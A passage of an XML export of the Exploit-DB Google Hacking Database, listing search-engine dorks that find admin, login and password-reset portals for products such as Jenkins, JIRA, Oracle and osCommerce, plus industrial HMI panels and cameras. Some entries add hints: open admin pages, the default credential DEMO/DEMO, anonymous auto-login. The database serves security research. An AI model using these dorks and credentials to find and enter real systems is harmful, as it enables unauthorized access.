<querystring>https://www.google.com/search?q=inurl:&quot;.Admin;-aspx }&quot; &quot;~Login&quot;</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Anjali Prakash</author>
</entry>
<entry>
<id>4401</id>
<link>https://www.exploit-db.com/ghdb/4401</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;.reset;-.pwd }&quot; &quot;~ User&quot;</shortDescription>
<textualDescription>Also here is more.
inurl:&quot;/ctl/SendPassword?returnurl=&quot; &quot;08&quot;
inurl:&quot;/Login/tabid/Default.aspx?&quot; &quot;73&quot;
-Where the number is you can put any number you want from 1-1000 or more.
-Xploit </textualDescription>
<query>inurl:&quot;.reset;-.pwd }&quot; &quot;~ User&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.reset;-.pwd }&quot; &quot;~ User&quot;</querystring>
<edb></edb>
<date>2017-03-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4223</id>
<link>https://www.exploit-db.com/ghdb/4223</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/,DanaInfo=&quot;</shortDescription>
<textualDescription>Yet another Remote Login Dork.
-Xploit </textualDescription>
<query>inurl:&quot;/,DanaInfo=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/,DanaInfo=&quot;</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>7464</id>
<link>https://www.exploit-db.com/ghdb/7464</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/?a=login&quot; intext:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/?a=login&quot; intext:&quot;login&quot;
# Pages Containing Login Portals
# Date: 19/10/2021
# Exploit Author: Reza Abasi</textualDescription>
<query>inurl:&quot;/?a=login&quot; intext:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/?a=login&quot; intext:&quot;login&quot;</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5446</id>
<link>https://www.exploit-db.com/ghdb/5446</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/?action=login&quot; intitle:&quot;Log In&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/?action=login&quot; intitle:&quot;Log In&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/?action=login&quot; intitle:&quot;Log In&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/?action=login&quot; intitle:&quot;Log In&quot;</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7463</id>
<link>https://www.exploit-db.com/ghdb/7463</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/?page=login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/?page=login&quot;
# Pages Containing Login Portals
# Date: 19/10/2021
# Exploit Author: Reza Abasi</textualDescription>
<query>inurl:&quot;/?page=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/?page=login&quot;</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>1413</id>
<link>https://www.exploit-db.com/ghdb/1413</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/?pagename=AdministratorLogin&quot;</shortDescription>
<textualDescription>Powered by Bariatric AdvantageAdmin Login:Admin login pages for what looks like an inhouse eshop. No obvious public exploits but I'm sure there is a way WinkMore info found here:h**p://catalinalifesciences.com/ Credit to cp for the clean up</textualDescription>
<query>inurl:&quot;/?pagename=AdministratorLogin&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22%2F%3Fpagename%3DAdministratorLogin%22</querystring>
<edb></edb>
<date>2006-09-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1414</id>
<link>https://www.exploit-db.com/ghdb/1414</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/?pagename=CustomerLogin&quot;</shortDescription>
<textualDescription>Customer login pages for what looks like an inhouse eshop. More information here:h**p://catalinalifesciences.com/ Credit to cp for clean up.</textualDescription>
<query>inurl:&quot;/?pagename=CustomerLogin&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22/?pagename=CustomerLogin%22</querystring>
<edb></edb>
<date>2006-09-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>6667</id>
<link>https://www.exploit-db.com/ghdb/6667</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/?q=user/password/&quot;</shortDescription>
<textualDescription>inurl:&quot;/?q=user/password/&quot;
Pages containing login portal:
BR,
Reza Abasi(Turku)
Iranian cyber sec researcher
</textualDescription>
<query>inurl:&quot;/?q=user/password/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/?q=user/password/&quot;</querystring>
<edb></edb>
<date>2020-11-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8045</id>
<link>https://www.exploit-db.com/ghdb/8045</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/adfs/ls/&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/adfs/ls/&quot;
# Pages Containing Login Portals
# Date:31/01/2023
# Exploit Author: Lorenzo Albano Fontanot</textualDescription>
<query>inurl:&quot;/adfs/ls/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/adfs/ls/&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>Lorenzo Albano Fontanot</author>
</entry>
<entry>
<id>4434</id>
<link>https://www.exploit-db.com/ghdb/4434</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/admin.php?cont=&quot;</shortDescription>
<textualDescription>Finds Radius Manager login pages (mostly HTTP!)
Dxtroyer</textualDescription>
<query>inurl:&quot;/admin.php?cont=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/admin.php?cont=&quot;</querystring>
<edb></edb>
<date>2017-04-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1271</id>
<link>https://www.exploit-db.com/ghdb/1271</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/admin/configuration. php?&quot; Mystore</shortDescription>
<textualDescription>simply google inurl trick for Oscommerce for open administrator page.If no .htpassword is set for the admin folder of osCommerce then of course you can change any setting in the shop unless password security has been enabled on the admin console.Despite a few demo pages there are a few open admin pages for webshops.Simple patch if you are one is to place a .htpassword file in the root of the admin folder. -- J.R.Middleton</textualDescription>
<query>inurl:&quot;/admin/configuration. php?&quot; Mystore</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Fadmin%2Fconfiguration.+php%3F%22+Mystore</querystring>
<edb></edb>
<date>2006-03-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5632</id>
<link>https://www.exploit-db.com/ghdb/5632</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/Admin/Forget.php&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/Admin/Forget.php&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/Admin/Forget.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Admin/Forget.php&quot;</querystring>
<edb></edb>
<date>2019-11-08</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4777</id>
<link>https://www.exploit-db.com/ghdb/4777</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/Admin/Login?ReturnUrl=&quot; -github.com -gitlab.com</shortDescription>
<textualDescription>Admin login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;/Admin/Login?ReturnUrl=&quot; -github.com -gitlab.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Admin/Login?ReturnUrl=&quot; -github.com -gitlab.com</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5890</id>
<link>https://www.exploit-db.com/ghdb/5890</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/auth.php?forgot_password=yes&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/auth.php?forgot_password=yes&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/auth.php?forgot_password=yes&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/auth.php?forgot_password=yes&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7182</id>
<link>https://www.exploit-db.com/ghdb/7182</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/bitrix/admin/&quot; intitle:&quot;Autorisation&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/bitrix/admin/&quot; intitle:&quot;Autorisation&quot;
# Pages Containing Login Portals
# Date: 07/09/2021
# Exploit Author: Herve Yao Nyhl
</textualDescription>
<query>inurl:&quot;/bitrix/admin/&quot; intitle:&quot;Autorisation&quot;</query>
<querystring>https://www.google.com/search?q=Dork</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Herve Yao Nyhl</author>
</entry>
<entry>
<id>6858</id>
<link>https://www.exploit-db.com/ghdb/6858</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/deltaweb/hmi_login.asp&quot; intext:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/deltaweb/hmi_login.asp&quot; intext:&quot;login&quot;
# Pages Containing Login Portals
# Date: 06/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>inurl:&quot;/deltaweb/hmi_login.asp&quot; intext:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/deltaweb/hmi_login.asp&quot; intext:&quot;login&quot;</querystring>
<edb></edb>
<date>2021-04-09</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>5955</id>
<link>https://www.exploit-db.com/ghdb/5955</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/dynamic/password-reset.html&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/dynamic/password-reset.html&quot;
inurl:&quot;/dynamic/login.html&quot; intitle:&quot;Linksys&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/dynamic/password-reset.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/dynamic/password-reset.html&quot;</querystring>
<edb></edb>
<date>2020-04-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4275</id>
<link>https://www.exploit-db.com/ghdb/4275</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/eyeos/index.php&quot; -github -forum</shortDescription>
<textualDescription>Google dork Description: inurl:&quot;/eyeos/index.php&quot; -github -forum
Google search: inurl:&quot;/eyeos/index.php&quot; -github -forum
Date: 2016-29-04
Author: khajj16
Summary: WebOS login portal for EyeOS.</textualDescription>
<query>inurl:&quot;/eyeos/index.php&quot; -github -forum</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/eyeos/index.php&quot; -github -forum</querystring>
<edb></edb>
<date>2016-04-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4466</id>
<link>https://www.exploit-db.com/ghdb/4466</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/fmi/webd&quot;</shortDescription>
<textualDescription>FileMaker WebDirect Logins
Another file cloud folder.
-Xploit
</textualDescription>
<query>inurl:&quot;/fmi/webd&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/fmi/webd&quot;</querystring>
<edb></edb>
<date>2017-05-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6164</id>
<link>https://www.exploit-db.com/ghdb/6164</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/forgotpassword.php&quot;</shortDescription>
<textualDescription># Google Dork inurl:&quot;/forgotpassword.php&quot;
# Description:- Various pages containing forgot password portals which will
include various router password page, govt websites, many other companies
who have php page of forgot password.
# Author: Agrah Jain
# Date: 30-May-2020
</textualDescription>
<query>inurl:&quot;/forgotpassword.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/forgotpassword.php&quot;</querystring>
<edb></edb>
<date>2020-06-02</date>
<author>Agrah Jain</author>
</entry>
<entry>
<id>4758</id>
<link>https://www.exploit-db.com/ghdb/4758</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/forgotpwd.jspx&quot;</shortDescription>
<textualDescription>Oracle Identity Manager password Reset pages. Sometimes it will auto login
as anonymous user by default.
Bruno Schmid
</textualDescription>
<query>inurl:&quot;/forgotpwd.jspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/forgotpwd.jspx&quot;</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4703</id>
<link>https://www.exploit-db.com/ghdb/4703</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/forms/frmservlet?config=&quot; login</shortDescription>
<textualDescription>Various login portals and custom applications using Oracle executable forms
services, to use this dork properly it requires java running in the browser.
Bruno Schmid
</textualDescription>
<query>inurl:&quot;/forms/frmservlet?config=&quot; login</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/forms/frmservlet?config=&quot; login</querystring>
<edb></edb>
<date>2018-03-20</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5250</id>
<link>https://www.exploit-db.com/ghdb/5250</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/fuel/login&quot;</shortDescription>
<textualDescription>Fuel CMS Login Panels
</textualDescription>
<query>inurl:&quot;/fuel/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/fuel/login&quot;</querystring>
<edb></edb>
<date>2019-06-06</date>
<author>Dec0y</author>
</entry>
<entry>
<id>5640</id>
<link>https://www.exploit-db.com/ghdb/5640</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php/main/login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php/main/login&quot;
inurl:&quot;/index.php/Main/Forgot_Password&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php/main/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php/main/login&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5574</id>
<link>https://www.exploit-db.com/ghdb/5574</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php/site/login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php/site/login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php/site/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php/site/login&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5589</id>
<link>https://www.exploit-db.com/ghdb/5589</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?action=login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?action=login&quot;
inurl:&quot;/index.php?section=login&quot;
inurl:&quot;/index.php/login?view=reset&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?action=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?action=login&quot;</querystring>
<edb></edb>
<date>2019-10-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5637</id>
<link>https://www.exploit-db.com/ghdb/5637</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?content=login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?content=login&quot;
inurl:&quot;/index.php?content=forgot&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?content=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?content=login&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5572</id>
<link>https://www.exploit-db.com/ghdb/5572</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?gt=member/login&quot;</shortDescription>
<textualDescription>Login POrtal:
inurl:&quot;/index.php?gt=member/login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?gt=member/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?gt=member/login&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5638</id>
<link>https://www.exploit-db.com/ghdb/5638</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?p=login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?p=login&quot;
inurl:&quot;/index.php?p=password_reset&quot;
inurl:&quot;/index.php?p=forgot&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?p=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?p=login&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5584</id>
<link>https://www.exploit-db.com/ghdb/5584</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?page=login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?page=login&quot;
inurl:&quot;/index.php?page=changepass&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?page=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?page=login&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5639</id>
<link>https://www.exploit-db.com/ghdb/5639</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?pageID=login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?pageID=login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?pageID=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?pageID=login&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7971</id>
<link>https://www.exploit-db.com/ghdb/7971</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?qa=login&quot;</shortDescription>
<textualDescription> Google Dork: inurl:&quot;/index.php?qa=login&quot;
# Pages Containing Login Portals
# Date:18/07/2022
# Exploit Author: Reza Abasi</textualDescription>
<query>inurl:&quot;/index.php?qa=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?qa=login&quot;</querystring>
<edb></edb>
<date>2022-07-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5573</id>
<link>https://www.exploit-db.com/ghdb/5573</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?r=site/login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?r=site/login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?r=site/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?r=site/login&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5681</id>
<link>https://www.exploit-db.com/ghdb/5681</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?reconnect=1&quot;</shortDescription>
<textualDescription>Zabbix Login Portal:
inurl:&quot;/index.php?reconnect=1&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?reconnect=1&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?reconnect=1&quot;</querystring>
<edb></edb>
<date>2020-01-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6185</id>
<link>https://www.exploit-db.com/ghdb/6185</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?route=account/forgotten&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?route=account/forgotten&quot;
BR,
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?route=account/forgotten&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?route=account/forgotten&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5571</id>
<link>https://www.exploit-db.com/ghdb/5571</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?route=account/login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?route=account/login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?route=account/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?route=account/login&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6237</id>
<link>https://www.exploit-db.com/ghdb/6237</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?route=account/password&quot;</shortDescription>
<textualDescription> #* Google Dork: inurl:&quot;/index.php?route=account/password&quot;*
*# Date: 07/06/2020*
*# List of Employee login page of various website*
*# Author: Arindam Halder*
*# LinkedIn: www.linkedin.com/in/arindam-halder-0798
*
*Best Regards,*
*Arindam Halder*
</textualDescription>
<query>Pages Containing Login Portal into Various Web Server</query>
<querystring>https://www.google.com/search?q=Pages Containing Login Portal into Various Web Server</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Arindam Halder</author>
</entry>
<entry>
<id>5636</id>
<link>https://www.exploit-db.com/ghdb/5636</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/index.php?title=Special:Userlogin&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/index.php?title=Special:Userlogin&quot;
inurl:&quot;/index.php?title=Special:PasswordReset&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/index.php?title=Special:Userlogin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/index.php?title=Special:Userlogin&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4761</id>
<link>https://www.exploit-db.com/ghdb/4761</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/initiatesso?providerid=&quot; -github.com</shortDescription>
<textualDescription>Pages containing login portals with high probability to be an Oracle Access
Manager portal typical containing &quot;initiatesso?providerid&quot; in the url
Bruno Schmid
</textualDescription>
<query>inurl:&quot;/initiatesso?providerid=&quot; -github.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/initiatesso?providerid=&quot; -github.com</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4660</id>
<link>https://www.exploit-db.com/ghdb/4660</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/jde/E1Menu.maf&quot;</shortDescription>
<textualDescription>This dork is to search for public available jd edward ERP portals.
Dork: inurl:&quot;/jde/E1Menu.maf&quot;
As per Oracle documentation the default username: DEMO and password: DEMO
</textualDescription>
<query>inurl:&quot;/jde/E1Menu.maf&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/jde/E1Menu.maf&quot;</querystring>
<edb></edb>
<date>2018-01-22</date>
<author>Muhammad Amir Naseem</author>
</entry>
<entry>
<id>3910</id>
<link>https://www.exploit-db.com/ghdb/3910</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/jenkins/login&quot; &quot;Page generated&quot;</shortDescription>
<textualDescription>Finds login pages for Jenkins continuous integration servers.
- Andy G - twitter.com/vxhex</textualDescription>
<query>inurl:&quot;/jenkins/login&quot; &quot;Page generated&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/jenkins/login&quot; &quot;Page generated&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4889</id>
<link>https://www.exploit-db.com/ghdb/4889</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/jira/login.jsp&quot; intitle:&quot;JIRA login&quot;</shortDescription>
<textualDescription>inurl:&quot;/jira/login.jsp&quot; intitle:&quot;JIRA login&quot;
Jira login pages
ManhNho
</textualDescription>
<query>inurl:&quot;/jira/login.jsp&quot; intitle:&quot;JIRA login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/jira/login.jsp&quot; intitle:&quot;JIRA login&quot;</querystring>
<edb></edb>
<date>2018-07-09</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5774</id>
<link>https://www.exploit-db.com/ghdb/5774</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/jw/web/login&quot;</shortDescription>
<textualDescription>Joget Workflow Enterprise framework login pages
inurl:&quot;/jw/web/login&quot;
Author: Zulfiqar Wardi (yunaranyancat)
</textualDescription>
<query>inurl:&quot;/jw/web/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/jw/web/login&quot;</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>yunaranyancat</author>
</entry>
<entry>
<id>4653</id>
<link>https://www.exploit-db.com/ghdb/4653</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/libs/granite/core/content/login.html&quot;</shortDescription>
<textualDescription>The following dork will give you the list of AEM Installed server. (Adobe
Experience Manager)
inurl:&quot;/libs/granite/core/content/login.html&quot;
</textualDescription>
<query>inurl:&quot;/libs/granite/core/content/login.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/libs/granite/core/content/login.html&quot;</querystring>
<edb></edb>
<date>2018-01-08</date>
<author>Pratik S. Shah</author>
</entry>
<entry>
<id>8207</id>
<link>https://www.exploit-db.com/ghdb/8207</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.aspx&quot; intitle:&quot;adminlogin&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/login.aspx&quot; intitle:&quot;adminlogin&quot;
# Pages Containing Login Portals
# Date:02/06/2023
# Exploit Author: Sachin Gupta</textualDescription>
<query>inurl:&quot;/login.aspx&quot; intitle:&quot;adminlogin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login.aspx&quot; intitle:&quot;adminlogin&quot;</querystring>
<edb></edb>
<date>2023-06-02</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>8283</id>
<link>https://www.exploit-db.com/ghdb/8283</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.aspx&quot; intitle:&quot;pass&quot;.</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/login.aspx&quot; intitle:&quot;pass&quot;.
# Pages Containing Login Portals
# Date: 30/10/2023
# Exploit swara kalsekar</textualDescription>
<query>Submitting a google dork.</query>
<querystring>https://www.google.com/search?q=Submitting a google dork.</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>swara kalsekar</author>
</entry>
<entry>
<id>8208</id>
<link>https://www.exploit-db.com/ghdb/8208</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.aspx&quot; intitle:&quot;user&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/login.aspx&quot; intitle:&quot;user&quot;
# Pages Containing Login Portals
# Date:02/06/2023
# Exploit Author: Sachin Gupta</textualDescription>
<query>inurl:&quot;/login.aspx&quot; intitle:&quot;user&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login.aspx&quot; intitle:&quot;user&quot;</querystring>
<edb></edb>
<date>2023-06-02</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>8241</id>
<link>https://www.exploit-db.com/ghdb/8241</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.aspx&quot; intitle:&quot;user&quot; intext:&quot;admin&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/login.aspx&quot; intitle:&quot;user&quot; intext:&quot;admin&quot;
# Pages Containing Login Portals
# Date: 02/10/2023
# Exploit Momin Monis</textualDescription>
<query>admin panel and open server misconfigure</query>
<querystring>https://www.google.com/search?q=admin panel and open server misconfigure</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Momin Monis</author>
</entry>
<entry>
<id>6864</id>
<link>https://www.exploit-db.com/ghdb/6864</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.htm&quot; &quot;Hitron Technologies&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login&quot; &quot;Please sign in to EP SmartStart&quot;
# Pages Containing Login Portals
# Date: 12/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>inurl:&quot;/login.htm&quot; &quot;Hitron Technologies&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login.htm&quot; &quot;Hitron Technologies&quot;</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>5775</id>
<link>https://www.exploit-db.com/ghdb/5775</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.htm?page=&quot; intext:&quot;Loading login page&quot;</shortDescription>
<textualDescription>Blue Iris Cam Login Page
inurl:&quot;/login.htm?page=&quot; intext:&quot;Loading login page&quot;
Author : Zulfiqar Wardi (yunaranyancat)
</textualDescription>
<query>inurl:&quot;/login.htm?page=&quot; intext:&quot;Loading login page&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login.htm?page=&quot; intext:&quot;Loading login page&quot;</querystring>
